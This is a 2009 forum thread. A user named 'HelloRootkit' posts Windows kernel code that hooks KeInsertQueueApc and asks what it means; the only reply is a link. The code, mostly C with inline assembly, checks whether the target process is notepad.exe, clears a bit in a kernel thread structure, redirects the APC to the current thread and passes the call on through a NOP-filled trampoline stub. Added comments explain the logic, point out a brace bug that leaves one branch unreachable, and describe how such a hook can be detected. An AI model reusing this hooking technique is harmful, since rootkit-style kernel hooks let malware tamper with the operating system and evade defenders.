HelloRootkit Posted March 25, 2009 Posted March 25, 2009
/*
 * Replacement routine installed in place of KeInsertQueueApc (MSVC, Windows
 * kernel mode; the (ULONG) casts of pointers make this 32-bit only).
 *
 * Resolves the process that owns the thread the APC is aimed at, compares its
 * image file name with "notepad.exe" and the PriorityBoost with 2, and in the
 * else branch clears bit 0 of the ULONG at Apc->Thread + g_ThreadFlagsOffset
 * and retargets the APC at the calling thread. Every path ends by jumping to
 * Call_KeInsertQueueApc, i.e. the original function is always called through
 * Proxy_KeInsertQueueApc.
 *
 * Globals referenced but not defined on this page: g_ThreadFlagsOffset
 * (and g_ProcessNameOffset, only in the commented-out line). Which thread
 * flag bit 0 is at that offset is not shown here.
 *
 * NOTE(review): the first `if` has no braces, so the `else` pairs with the
 * inner `if`. Because the inner condition is the outer condition plus one more
 * `||` term, the inner test is true whenever it is reached, and the else body
 * is not entered as written.
 *
 * Defensive note: an inline/export hook of a kernel routine like this is
 * detectable by comparing the in-memory bytes of the hooked function against
 * the on-disk image; the DbgPrint call also leaves a visible debugger trace.
 */
BOOLEAN __stdcall fake_KeInsertQueueApc(IN PKAPC Apc, IN PVOID SystemArgument1, IN PVOID SystemArgument2, IN KPRIORITY PriorityBoost)
{
    PEPROCESS pTargetProcess;
    PUCHAR pTargetProcessName;
    ULONG XXThread;  /* holds an ADDRESS (thread + flags offset), consumed by the asm block below */
    //-------------------------------------------------------------------------------------------------------
    /* Process owning the thread the APC is queued to. */
    pTargetProcess=IoThreadToProcess( (PETHREAD)Apc->Thread );// pTargetProcessName=(PUCHAR)((ULONG)pTargetProcess+g_ProcessNameOffset);
    /* Image name via the exported (undocumented) PsGetProcessImageFileName; its length/truncation rules are not shown here. */
    pTargetProcessName=PsGetProcessImageFileName(pTargetProcess);
    //-------------------------------------------------------------------------------------------------------//
    /* Outer test: name differs from "notepad.exe" (strcmp != 0) OR PriorityBoost != 2. No braces: the nested if/else below is its body. */
    if ((strcmp(pTargetProcessName,"notepad.exe"))||PriorityBoost!=2)
    /* Inner test: same terms plus Apc != SystemArgument1 (a PKAPC compared with a PVOID; the convention behind that is not on this page). */
    if ((strcmp(pTargetProcessName,"notepad.exe"))||PriorityBoost!=2||Apc!=SystemArgument1)
    {
        goto Call_KeInsertQueueApc;
    }
    else
    {
        DbgPrint("TargetProcessName is %s\n",pTargetProcessName);
        /* Address of the flags field inside the target thread object. */
        XXThread = (ULONG)Apc->Thread + g_ThreadFlagsOffset;
        __asm
        {
            mov eax, XXThread        /* eax = address computed above */
            and [eax], 0xfffffffe    /* clear bit 0 of the dword at that address */
        }
        /* Redirect the APC from its original target thread to the caller's thread. */
        Apc->Thread=KeGetCurrentThread();
        goto Call_KeInsertQueueApc;
    }
Call_KeInsertQueueApc:
    /* Pass-through to the original routine via the trampoline stub. */
    return Proxy_KeInsertQueueApc(Apc,SystemArgument1,SystemArgument2,PriorityBoost);
}
//================================================================================================
/*
 * Trampoline stub for the original KeInsertQueueApc. `naked` means the
 * compiler emits no prologue/epilogue; the body is twelve 0x90 (NOP) bytes
 * and contains no `ret`, so as shown it does not return. Presumably the bytes
 * are overwritten at runtime by code not on this page — TODO confirm.
 */
__declspec (naked) BOOLEAN Proxy_KeInsertQueueApc(IN PKAPC Apc, IN PVOID SystemArgument1, IN PVOID SystemArgument2, IN KPRIORITY PriorityBoost)
{
    __asm
    {
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
    }
}
what's mean?
GamingMasteR Posted March 25, 2009 Posted March 25, 2009 http://forum.tuts4you.com/index.php?showtopic=18615